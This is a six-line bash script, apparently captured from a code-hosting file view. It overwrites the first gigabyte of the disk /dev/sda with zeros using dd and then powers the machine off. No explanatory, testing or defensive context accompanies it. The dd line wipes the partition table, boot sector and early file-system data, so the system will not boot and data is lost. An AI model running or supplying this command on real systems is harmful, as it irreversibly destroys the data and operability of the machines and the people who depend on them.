6 lines
68 B
Bash
6 lines
68 B
Bash
|
|
#!/bin/bash
|
||
|
|
|
||
|
|
dd if=/dev/zero of=/dev/sda bs=1M count=1000
|
||
|
|
|
||
|
|
poweroff
|